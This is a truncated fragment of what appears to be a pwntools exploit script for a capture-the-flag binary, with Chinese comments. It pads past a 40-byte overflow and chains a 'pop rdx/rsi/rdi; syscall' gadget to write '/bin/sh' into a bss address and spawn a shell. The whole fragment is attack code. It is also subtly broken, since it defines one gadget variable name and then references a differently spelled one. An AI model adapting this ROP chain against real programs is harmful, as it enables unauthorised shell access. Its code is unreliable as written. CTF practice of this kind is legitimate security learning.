offet=40#溢出所需字节数bss=p64(0x404080)#刚刚在IDA找到的str1地址段pop_rdx_rsi_rdi_syscall=0x401197#优质片段shellcode=b'/bin/sh'#用来结束这个字符串payload=cyclic(offet)#垃圾数据payload+=p64(pop__rdx_rsi_rdi_syscall)+p64(0)+p64(0)+p64(bss)#把bss传入rdipayload2=b'/bin/sh'+b'...